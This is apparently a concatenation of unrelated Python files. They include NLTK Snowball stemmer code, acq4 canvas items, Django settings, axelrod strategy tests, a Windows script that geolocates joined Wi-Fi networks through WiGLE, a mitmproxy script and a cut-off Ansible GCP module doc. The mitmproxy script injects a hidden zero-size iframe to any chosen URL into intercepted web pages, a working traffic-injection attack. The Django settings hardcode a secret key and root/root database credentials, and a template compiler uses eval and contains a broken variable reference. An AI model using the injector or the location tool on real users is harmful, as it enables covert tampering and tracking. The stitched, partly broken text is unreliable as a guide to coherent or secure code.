:note: This helper method is invoked by the stem method of the subclass
RussianStemmer. It is not to be invoked directly!
"""
r1 = ""
r2 = ""
rv = ""
vowels = ("A", "U", "E", "a", "e", "i", "o", "u", "y")
word = (word.replace("i^a", "A")
.replace("i^u", "U")
.replace("e`", "E"))
for i in range(1, len(word)):
if word[i] not in vowels and word[i-1] in vowels:
r1 = word[i+1:]
break
for i in range(1, len(r1)):
if r1[i] not in vowels and r1[i-1] in vowels:
r2 = r1[i+1:]
break
for i in range(len(word)):
if word[i] in vowels:
rv = word[i+1:]
break
r2 = (r2.replace("A", "i^a")
.replace("U", "i^u")
.replace("E", "e`"))
rv = (rv.replace("A", "i^a")
.replace("U", "i^u")
.replace("E", "e`"))
return (rv, r2)
def __cyrillic_to_roman(self, word):
"""
Transliterate a Russian word into the Roman alphabet.
A Russian word whose letters consist of the Cyrillic
alphabet are transliterated into the Roman alphabet
in order to ease the forthcoming stemming process.
:param word: The word that is transliterated.
:type word: unicode
:return: the transliterated word.
:rtype: unicode
:note: This helper method is invoked by the stem method of the subclass
RussianStemmer. It is not to be invoked directly!
"""
word = (word.replace("\u0410", "a").replace("\u0430", "a")
.replace("\u0411", "b").replace("\u0431", "b")
.replace("\u0412", "v").replace("\u0432", "v")
.replace("\u0413", "g").replace("\u0433", "g")
.replace("\u0414", "d").replace("\u0434", "d")
.replace("\u0415", "e").replace("\u0435", "e")
.replace("\u0401", "e").replace("\u0451", "e")
.replace("\u0416", "zh").replace("\u0436", "zh")
.replace("\u0417", "z").replace("\u0437", "z")
.replace("\u0418", "i").replace("\u0438", "i")
.replace("\u0419", "i`").replace("\u0439", "i`")
.replace("\u041A", "k").replace("\u043A", "k")
.replace("\u041B", "l").replace("\u043B", "l")
.replace("\u041C", "m").replace("\u043C", "m")
.replace("\u041D", "n").replace("\u043D", "n")
.replace("\u041E", "o").replace("\u043E", "o")
.replace("\u041F", "p").replace("\u043F", "p")
.replace("\u0420", "r").replace("\u0440", "r")
.replace("\u0421", "s").replace("\u0441", "s")
.replace("\u0422", "t").replace("\u0442", "t")
.replace("\u0423", "u").replace("\u0443", "u")
.replace("\u0424", "f").replace("\u0444", "f")
.replace("\u0425", "kh").replace("\u0445", "kh")
.replace("\u0426", "t^s").replace("\u0446", "t^s")
.replace("\u0427", "ch").replace("\u0447", "ch")
.replace("\u0428", "sh").replace("\u0448", "sh")
.replace("\u0429", "shch").replace("\u0449", "shch")
.replace("\u042A", "''").replace("\u044A", "''")
.replace("\u042B", "y").replace("\u044B", "y")
.replace("\u042C", "'").replace("\u044C", "'")
.replace("\u042D", "e`").replace("\u044D", "e`")
.replace("\u042E", "i^u").replace("\u044E", "i^u")
.replace("\u042F", "i^a").replace("\u044F", "i^a"))
return word
def __roman_to_cyrillic(self, word):
"""
Transliterate a Russian word back into the Cyrillic alphabet.
A Russian word formerly transliterated into the Roman alphabet
in order to ease the stemming process, is transliterated back
into the Cyrillic alphabet, its original form.
:param word: The word that is transliterated.
:type word: str or unicode
:return: word, the transliterated word.
:rtype: unicode
:note: This helper method is invoked by the stem method of the subclass
RussianStemmer. It is not to be invoked directly!
"""
word = (word.replace("i^u", "\u044E").replace("i^a", "\u044F")
.replace("shch", "\u0449").replace("kh", "\u0445")
.replace("t^s", "\u0446").replace("ch", "\u0447")
.replace("e`", "\u044D").replace("i`", "\u0439")
.replace("sh", "\u0448").replace("k", "\u043A")
.replace("e", "\u0435").replace("zh", "\u0436")
.replace("a", "\u0430").replace("b", "\u0431")
.replace("v", "\u0432").replace("g", "\u0433")
.replace("d", "\u0434").replace("e", "\u0435")
.replace("z", "\u0437").replace("i", "\u0438")
.replace("l", "\u043B").replace("m", "\u043C")
.replace("n", "\u043D").replace("o", "\u043E")
.replace("p", "\u043F").replace("r", "\u0440")
.replace("s", "\u0441").replace("t", "\u0442")
.replace("u", "\u0443").replace("f", "\u0444")
.replace("''", "\u044A").replace("y", "\u044B")
.replace("'", "\u044C"))
return word
class SpanishStemmer(_StandardStemmer):
"""
The Spanish Snowball stemmer.
:cvar __vowels: The Spanish vowels.
:type __vowels: unicode
:cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
:type __step0_suffixes: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2a_suffixes: Suffixes to be deleted in step 2a of the algorithm.
:type __step2a_suffixes: tuple
:cvar __step2b_suffixes: Suffixes to be deleted in step 2b of the algorithm.
:type __step2b_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:note: A detailed description of the Spanish
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/spanish/stemmer.html
"""
__vowels = "aeiou\xE1\xE9\xED\xF3\xFA\xFC"
__step0_suffixes = ("selas", "selos", "sela", "selo", "las",
"les", "los", "nos", "me", "se", "la", "le",
"lo")
__step1_suffixes = ('amientos', 'imientos', 'amiento', 'imiento',
'aciones', 'uciones', 'adoras', 'adores',
'ancias', 'log\xEDas', 'encias', 'amente',
'idades', 'anzas', 'ismos', 'ables', 'ibles',
'istas', 'adora', 'aci\xF3n', 'antes',
'ancia', 'log\xEDa', 'uci\xf3n', 'encia',
'mente', 'anza', 'icos', 'icas', 'ismo',
'able', 'ible', 'ista', 'osos', 'osas',
'ador', 'ante', 'idad', 'ivas', 'ivos',
'ico',
'ica', 'oso', 'osa', 'iva', 'ivo')
__step2a_suffixes = ('yeron', 'yendo', 'yamos', 'yais', 'yan',
'yen', 'yas', 'yes', 'ya', 'ye', 'yo',
'y\xF3')
__step2b_suffixes = ('ar\xEDamos', 'er\xEDamos', 'ir\xEDamos',
'i\xE9ramos', 'i\xE9semos', 'ar\xEDais',
'aremos', 'er\xEDais', 'eremos',
'ir\xEDais', 'iremos', 'ierais', 'ieseis',
'asteis', 'isteis', '\xE1bamos',
'\xE1ramos', '\xE1semos', 'ar\xEDan',
'ar\xEDas', 'ar\xE9is', 'er\xEDan',
'er\xEDas', 'er\xE9is', 'ir\xEDan',
'ir\xEDas', 'ir\xE9is',
'ieran', 'iesen', 'ieron', 'iendo', 'ieras',
'ieses', 'abais', 'arais', 'aseis',
'\xE9amos', 'ar\xE1n', 'ar\xE1s',
'ar\xEDa', 'er\xE1n', 'er\xE1s',
'er\xEDa', 'ir\xE1n', 'ir\xE1s',
'ir\xEDa', 'iera', 'iese', 'aste', 'iste',
'aban', 'aran', 'asen', 'aron', 'ando',
'abas', 'adas', 'idas', 'aras', 'ases',
'\xEDais', 'ados', 'idos', 'amos', 'imos',
'emos', 'ar\xE1', 'ar\xE9', 'er\xE1',
'er\xE9', 'ir\xE1', 'ir\xE9', 'aba',
'ada', 'ida', 'ara', 'ase', '\xEDan',
'ado', 'ido', '\xEDas', '\xE1is',
'\xE9is', '\xEDa', 'ad', 'ed', 'id',
'an', 'i\xF3', 'ar', 'er', 'ir', 'as',
'\xEDs', 'en', 'es')
__step3_suffixes = ("os", "a", "e", "o", "\xE1",
"\xE9", "\xED", "\xF3")
def stem(self, word):
"""
Stem a Spanish word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step1_success = False
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self._rv_standard(word, self.__vowels)
# STEP 0: Attached pronoun
for suffix in self.__step0_suffixes:
if not (word.endswith(suffix) and rv.endswith(suffix)):
continue
if ((rv[:-len(suffix)].endswith(("ando", "\xE1ndo",
"ar", "\xE1r",
"er", "\xE9r",
"iendo", "i\xE9ndo",
"ir", "\xEDr"))) or
(rv[:-len(suffix)].endswith("yendo") and
word[:-len(suffix)].endswith("uyendo"))):
word = self.__replace_accented(word[:-len(suffix)])
r1 = self.__replace_accented(r1[:-len(suffix)])
r2 = self.__replace_accented(r2[:-len(suffix)])
rv = self.__replace_accented(rv[:-len(suffix)])
break
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if not word.endswith(suffix):
continue
if suffix == "amente" and r1.endswith(suffix):
step1_success = True
word = word[:-6]
r2 = r2[:-6]
rv = rv[:-6]
if r2.endswith("iv"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith(("os", "ic", "ad")):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith(suffix):
step1_success = True
if suffix in ("adora", "ador", "aci\xF3n", "adoras",
"adores", "aciones", "ante", "antes",
"ancia", "ancias"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
elif suffix in ("log\xEDa", "log\xEDas"):
word = suffix_replace(word, suffix, "log")
rv = suffix_replace(rv, suffix, "log")
elif suffix in ("uci\xF3n", "uciones"):
word = suffix_replace(word, suffix, "u")
rv = suffix_replace(rv, suffix, "u")
elif suffix in ("encia", "encias"):
word = suffix_replace(word, suffix, "ente")
rv = suffix_replace(rv, suffix, "ente")
elif suffix == "mente":
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith(("ante", "able", "ible")):
word = word[:-4]
rv = rv[:-4]
elif suffix in ("idad", "idades"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
for pre_suff in ("abil", "ic", "iv"):
if r2.endswith(pre_suff):
word = word[:-len(pre_suff)]
rv = rv[:-len(pre_suff)]
elif suffix in ("ivo", "iva", "ivos", "ivas"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
else:
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 2a: Verb suffixes beginning 'y'
if not step1_success:
for suffix in self.__step2a_suffixes:
if (rv.endswith(suffix) and
word[-len(suffix)-1:-len(suffix)] == "u"):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 2b: Other verb suffixes
for suffix in self.__step2b_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
if suffix in ("en", "es", "\xE9is", "emos"):
if word.endswith("gu"):
word = word[:-1]
if rv.endswith("gu"):
rv = rv[:-1]
break
# STEP 3: Residual suffix
for suffix in self.__step3_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
if suffix in ("e", "\xE9"):
rv = rv[:-len(suffix)]
if word[-2:] == "gu" and rv.endswith("u"):
word = word[:-1]
break
word = self.__replace_accented(word)
return word
def __replace_accented(self, word):
"""
Replaces all accented letters on a word with their non-accented
counterparts.
:param word: A spanish word, with or without accents
:type word: str or unicode
:return: a word with the accented letters (á, é, í, ó, ú) replaced with
their non-accented counterparts (a, e, i, o, u)
:rtype: str or unicode
"""
return (word.replace("\xE1", "a")
.replace("\xE9", "e")
.replace("\xED", "i")
.replace("\xF3", "o")
.replace("\xFA", "u"))
class SwedishStemmer(_ScandinavianStemmer):
"""
The Swedish Snowball stemmer.
:cvar __vowels: The Swedish vowels.
:type __vowels: unicode
:cvar __s_ending: Letters that may directly appear before a word final 's'.
:type __s_ending: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:note: A detailed description of the Swedish
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/swedish/stemmer.html
"""
__vowels = "aeiouy\xE4\xE5\xF6"
__s_ending = "bcdfghjklmnoprtvy"
__step1_suffixes = ("heterna", "hetens", "heter", "heten",
"anden", "arnas", "ernas", "ornas", "andes",
"andet", "arens", "arna", "erna", "orna",
"ande", "arne", "aste", "aren", "ades",
"erns", "ade", "are", "ern", "ens", "het",
"ast", "ad", "en", "ar", "er", "or", "as",
"es", "at", "a", "e", "s")
__step2_suffixes = ("dd", "gd", "nn", "dt", "gt", "kt", "tt")
__step3_suffixes = ("fullt", "l\xF6st", "els", "lig", "ig")
def stem(self, word):
"""
Stem a Swedish word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
r1 = self._r1_scandinavian(word, self.__vowels)
# STEP 1
for suffix in self.__step1_suffixes:
if r1.endswith(suffix):
if suffix == "s":
if word[-2] in self.__s_ending:
word = word[:-1]
r1 = r1[:-1]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 2
for suffix in self.__step2_suffixes:
if r1.endswith(suffix):
word = word[:-1]
r1 = r1[:-1]
break
# STEP 3
for suffix in self.__step3_suffixes:
if r1.endswith(suffix):
if suffix in ("els", "lig", "ig"):
word = word[:-len(suffix)]
elif suffix in ("fullt", "l\xF6st"):
word = word[:-1]
break
return word
def demo():
"""
This function provides a demonstration of the Snowball stemmers.
After invoking this function and specifying a language,
it stems an excerpt of the Universal Declaration of Human Rights
(which is a part of the NLTK corpus collection) and then prints
out the original and the stemmed text.
"""
import re
from nltk.corpus import udhr
udhr_corpus = {"danish": "Danish_Dansk-Latin1",
"dutch": "Dutch_Nederlands-Latin1",
"english": "English-Latin1",
"finnish": "Finnish_Suomi-Latin1",
"french": "French_Francais-Latin1",
"german": "German_Deutsch-Latin1",
"hungarian": "Hungarian_Magyar-UTF8",
"italian": "Italian_Italiano-Latin1",
"norwegian": "Norwegian-Latin1",
"porter": "English-Latin1",
"portuguese": "Portuguese_Portugues-Latin1",
"romanian": "Romanian_Romana-Latin2",
"russian": "Russian-UTF8",
"spanish": "Spanish-Latin1",
"swedish": "Swedish_Svenska-Latin1",
}
print("\n")
print("******************************")
print("Demo for the Snowball stemmers")
print("******************************")
while True:
language = compat.raw_input("Please enter the name of the language " +
"to be demonstrated\n" +
"/".join(SnowballStemmer.languages) +
"\n" +
"(enter 'exit' in order to leave): ")
if language == "exit":
break
if language not in SnowballStemmer.languages:
print(("\nOops, there is no stemmer for this language. " +
"Please try again.\n"))
continue
stemmer = SnowballStemmer(language)
excerpt = udhr.words(udhr_corpus[language]) [:300]
stemmed = " ".join(stemmer.stem(word) for word in excerpt)
stemmed = re.sub(r"(.{,70})\s", r'\1\n', stemmed+' ').rstrip()
excerpt = " ".join(excerpt)
excerpt = re.sub(r"(.{,70})\s", r'\1\n', excerpt+' ').rstrip()
print("\n")
print('-' * 70)
print('ORIGINAL'.center(70))
print(excerpt)
print("\n\n")
print('STEMMED RESULTS'.center(70))
print(stemmed)
print('-' * 70)
print("\n")
|
from __future__ import print_function
from acq4.util import Qt
import acq4.pyqtgraph as pg
from .CanvasItem import CanvasItem
from .itemtypes import registerItemType
class GridCanvasItem(CanvasItem):
_typeName = "Grid"
def __init__(self, **kwds):
kwds.pop('viewRect', None)
item = pg.GridItem()
CanvasItem.__init__(self, item, **kwds)
registerItemType(GridCanvasItem)
class RulerCanvasItem(CanvasItem):
_typeName = "Ruler"
def __init__(self, points=None, **kwds):
vr = kwds.pop('viewRect', None)
if points is None:
if vr is None:
points = ((0, 0), (1, 1))
else:
p1 = vr.center()
p2 = p1 + 0.2 * (vr.topRight()-p1)
points = ((p1.x(), p1.y()), (p2.x(), p2.y()))
item = pg.graphicsItems.ROI.RulerROI(points)
CanvasItem.__init__(self, item, **kwds)
registerItemType(RulerCanvasItem)
class SvgCanvasItem(CanvasItem):
_typeName = "SVG"
def __init__(self, handle, **opts):
opts['handle'] = handle
item = Qt.QGraphicsSvgItem(handle.name())
CanvasItem.__init__(self, item, **opts)
@classmethod
def checkFile(cls, fh):
if fh.isFile() and fh.ext() == '.svg':
return 100
else:
return 0
registerItemType(SvgCanvasItem)
|
"""
Django settings for kboard project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'fbk#a_$7&@566onvmd1xfxyszz)npb+d5gq#y9q(n0wg_k)v0x'
DEBUG = True
ALLOWED_HOSTS = []
AUTH_USER_MODEL = 'accounts.Account'
INSTALLED_APPS = [
'accounts',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'board',
'django_summernote',
'djangobower',
'pipeline',
]
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'pipeline.finders.PipelineFinder'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'kboard.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'core.context_processors.navbar'
],
},
},
]
WSGI_APPLICATION = 'kboard.wsgi.application'
if DEBUG:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, '../database/db.sqlite3'),
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'kboard',
'USER': 'root',
'PASSWORD': 'root'
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
BOWER_INSTALLED_APPS = [
'jquery#3.1.1',
'bootstrap#3.3.7'
]
BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, '../')
SUMMERNOTE_CONFIG = {}
PIPELINE = {
'COMPILERS': {
'libsasscompiler.LibSassCompiler',
},
'JAVASCRIPT': {
'main': {
'source_filenames': [
'js/*.js'
],
'output_filename': 'js/vendor.js'
},
},
'STYLESHEETS': {
'main': {
'source_filenames': [
'style/*.scss'
],
'output_filename': 'style/main.css'
},
},
}
LANGUAGE_CODE = 'ko-kr'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, '../static')
STATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
os.path.join(BOWER_COMPONENTS_ROOT, 'bower_components'),
]
MEDIA_URL = '/file/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'file')
ACCOUNT_ACTIVATION_DAYS = 7
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = os.environ.get('KBOARD_EMAIL')
EMAIL_HOST_PASSWORD = os.environ.get('KBOARD_PASSWORD')
LOGIN_REDIRECT_URL = "/"
LOGOUT_REDIRECT_URL = "/"
|
"""Test for the once bitten strategy."""
import random
import axelrod
from .test_player import TestPlayer
C, D = 'C', 'D'
class TestOnceBitten(TestPlayer):
name = "Once Bitten"
player = axelrod.OnceBitten
expected_classifier = {
'memory_depth': 12,
'stochastic': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_initial_strategy(self):
"""Starts by cooperating."""
P1 = axelrod.OnceBitten()
P2 = axelrod.Player()
self.assertEqual(P1.strategy(P2), C)
def test_strategy(self):
"""If opponent defects at any point then the player will defect
forever."""
P1 = axelrod.OnceBitten()
P2 = axelrod.Player()
# Starts by playing C
self.assertEqual(P1.strategy(P2), C)
self.assertEqual(P1.grudged, False)
P2.history.append(C)
self.assertEqual(P1.strategy(P2), C)
self.assertEqual(P1.grudged, False)
P2.history.append(C)
self.assertEqual(P1.strategy(P2), C)
self.assertEqual(P1.grudged, False)
P2.history.append(D)
self.assertEqual(P1.strategy(P2), C)
self.assertEqual(P1.grudged, False)
P2.history.append(D)
self.assertEqual(P2.history, [C, C, D, D])
self.assertEqual(P1.strategy(P2), D)
self.assertEqual(P1.grudged, True)
for turn in range(P1.mem_length-1):
self.assertEqual(P1.strategy(P2), D)
# Doesn't matter what opponent plays now
P2.history.append(C)
self.assertEqual(P1.grudged, True)
P2.history.append(D)
self.assertEqual(P1.grudged, True)
self.assertEqual(P1.strategy(P2), D)
self.assertEqual(P1.grudge_memory, 10)
self.assertEqual(P1.grudged, True)
P2.history.append(C)
def test_reset(self):
"""Check that grudged gets reset properly"""
P1 = self.player()
P1.history = [C, D]
P2 = axelrod.Player()
P2.history = [D, D]
self.assertEqual(P1.strategy(P2), D)
self.assertTrue(P1.grudged)
P1.reset()
self.assertFalse(P1.grudged)
self.assertEqual(P1.history, [])
class TestFoolMeOnce(TestPlayer):
name = "Fool Me Once"
player = axelrod.FoolMeOnce
expected_classifier = {
'memory_depth': float('inf'), # Long memory
'stochastic': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_initial(self):
self.first_play_test(C)
def test_strategy(self):
"""
If opponent defects more than once, defect forever
"""
self.responses_test([C], [D], [C])
self.responses_test([C, C], [D, D], [D])
self.responses_test([C, C], [D, C], [C])
self.responses_test([C, C, C], [D, D, D], [D])
class TestForgetfulFoolMeOnce(TestPlayer):
name = 'Forgetful Fool Me Once'
player = axelrod.ForgetfulFoolMeOnce
expected_classifier = {
'memory_depth': float('inf'), # Long memory
'stochastic': True,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_initial(self):
self.first_play_test(C)
def test_strategy(self):
"""Test that will forgive one D but will grudge after 2 Ds, randomly
forgets count"""
random.seed(2)
self.responses_test([C], [D], [C])
self.responses_test([C, C], [D, D], [D])
# Sometime eventually forget count:
self.responses_test([C, C], [D, D], [D] * 13 + [C])
def test_reset(self):
"""Check that count gets reset properly"""
P1 = self.player()
P1.history = [C, D]
P2 = axelrod.Player()
P2.history = [D]
random.seed(1)
self.assertEqual(P1.strategy(P2), C)
self.assertEqual(P1.D_count, 1)
P1.reset()
self.assertEqual(P1.D_count, 0)
self.assertEqual(P1.history, [])
class TestFoolMeForever(TestPlayer):
name = "Fool Me Forever"
player = axelrod.FoolMeForever
expected_classifier = {
'memory_depth': float('inf'), # Long memory
'stochastic': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_strategy(self):
"""
If opponent defects more than once, defect forever
"""
self.responses_test([], [], [D])
self.responses_test([D], [D], [C])
self.responses_test([D], [C], [D])
self.responses_test([D, C], [D, C], [C])
self.responses_test([D, C, C], [D, C, C], [C])
|
""" Windows Registry Network Query
Lists the network name and MAC addresses of the networks that
this computer has connected to. If the location command is given
print the coordinates of the network if they are in the wigile
datebase
Don't be a moron, please don't use this for something illegal.
Usage:
windows_registry.py
windows_registry.py location <username> <password>
windows_registry.py -h | --help
windows_registry.py --version
Options:
-h, --help Display this message
--version Display the version of this program
"""
import mechanize
import urllib
import re
from _winreg import OpenKey, EnumKey, EnumValue, HKEY_LOCAL_MACHINE, CloseKey
from docopt import docopt
def binary2mac(binary):
address = ""
for char in binary:
address += ("%02x " % ord(char))
address = address.strip(" ").replace(" ", ":")[0:17]
return address
def wigle_print(username, password, netid):
browser = mechanize.Browser()
browser.open('http://wigle.net')
reqData = urllib.urlencode({'credential_0': username,
'credential_1': password})
browser.open('https://wigle.net//gps/gps/main/login', reqData)
params = {}
params['netid'] = netid
reqParams = urllib.urlencode(params)
respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
resp = browser.open(respURL, reqParams).read()
mapLat = 'N/A'
mapLon = 'N/A'
rLat = re.findall(r'maplat=.*\&', resp)
if rLat:
mapLat = rLat[0].split('&')[0].split('=')[1]
rLon = re.findall(r'maplon=.*\&', resp)
if rLon:
mapLon = rLon[0].split
print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
def print_networks(username=None, password=None):
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"
key = OpenKey(HKEY_LOCAL_MACHINE, net)
print '\n[*] Networks You have Joined.'
for i in range(100):
try:
guid = EnumKey(key, i)
netKey = OpenKey(key, str(guid))
(n, addr, t) = EnumValue(netKey, 5)
(n, name, t) = EnumValue(netKey, 4)
mac = binary2mac(addr)
net_name = str(name)
print '[+] ' + net_name + ' ' + mac
wigle_print(username, password, mac)
CloseKey(netKey)
except:
break
def main():
arguments = docopt(__doc__, version=0.1)
if arguments['location']:
print_networks(username=arguments['username'], password=arguments['password'])
else:
print_networks()
if __name__ == '__main__':
main()
|
import sys
from bs4 import BeautifulSoup
class Injector:
def __init__(self, iframe_url):
self.iframe_url = iframe_url
def response(self, flow):
if flow.request.host in self.iframe_url:
return
html = BeautifulSoup(flow.response.content, "html.parser")
if html.body:
iframe = html.new_tag(
"iframe",
src=self.iframe_url,
frameborder=0,
height=0,
width=0)
html.body.insert(0, iframe)
flow.response.content = str(html).encode("utf8")
def start():
if len(sys.argv) != 2:
raise ValueError('Usage: -s "iframe_injector.py url"')
return Injector(sys.argv[1])
|
import re
class Templates:
TOKENS = re.compile('([A-Za-z]+|[^ ])')
SIMPLE = {
'l': '_n.l.ptb()',
'r': '_n.r.ptb()',
'<': 'addr(_n)',
'>': 'addl(_n)',
}
def compile(self, template):
python = self.parse(self.TOKENS.findall(template))
return eval("lambda _n: %s" % python)
def parse(self, tokens):
t = tokens.pop(0)
if t in '([':
if t == '(':
label = "'%s'" % tokens.pop(0)
args = self.parse_args(tokens, ')')
elif s[0] == '[':
label = 'None'
args = self.parse_args(tokens, ']')
return 'PTB(_n, %s, %s)' % (label, ', '.join(args))
elif t in self.SIMPLE:
return self.SIMPLE[t]
else:
raise SyntaxError, "unknown token '%s'" % t
def parse_args(self, tokens, delimiter):
args = []
while tokens:
if tokens[0] == delimiter:
tokens.pop(0)
return args
args.append(self.parse(tokens))
raise SyntaxError, "missing closing '%s'" % delimiter
templates = Templates()
t = templates.compile("<")
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_backend_service
description:
- A Backend Service defines a group of virtual machines that will serve traffic for
load balancing. This resource is a global backend service, appropriate for external
load balancing or self-managed internal load balancing.
- For managed internal load balancing, use a regional backend service instead.
- Currently self-managed internal load balancing is only available in beta.
short_description: Creates a GCP BackendService
version_added: '2.6'
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
type: str
affinity_cookie_ttl_sec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set
to 0, the cookie is non-persistent and lasts only until the end of the browser
session (or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
required: false
type: int
backends:
description:
- The set of backends that serve this BackendService.
required: false
type: list
suboptions:
balancing_mode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION.
Valid values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
- 'Some valid choices include: "UTILIZATION", "RATE", "CONNECTION"'
required: false
default: UTILIZATION
type: str
capacity_scaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on
UTILIZATION, RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is
completely drained, offering 0% of its available Capacity. Valid range is
[0.0,1.0].
required: false
default: '1.0'
type: str
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
required: false
type: str
group:
description:
- The fully-qualified URL of an Instance Group or Network Endpoint Group resource.
In case of instance group this defines the list of instances that serve
traffic. Member virtual machine instances from each instance group must
live in the same zone as the instance group itself. No two backends in a
backend service are allowed to use same Instance Group resource.
- For Network Endpoint Groups this defines list of endpoints. All endpoints
of Network Endpoint Group must be hosted on instances located in the same
zone as the Network Endpoint Group.
- Backend service can not contain mix of Instance Group and Network Endpoint
Group backends.
- Note that you must specify an Instance Group or Network Endpoint Group resource
using the fully-qualified URL, rather than a partial URL.
required: false
type: str
max_connections:
description:
- The max number of simultaneous connections for the group. Can be used with
either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or one of maxConnectionsPerInstance
or maxConnectionsPerEndpoint, as appropriate for group type, must be set.
required: false
type: int
max_connections_per_instance:
description:
- The max number of simultaneous connections that a single backend instance
can handle. This is used to calculate the capacity of the group. Can be
used in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance
must be set.
required: false
type: int
max_connections_per_endpoint:
description:
- The max number of simultaneous connections that a single backend network
endpoint can handle. This is used to calculate the capacity of the group.
Can be used in either CONNECTION or UTILIZATION balancing modes.
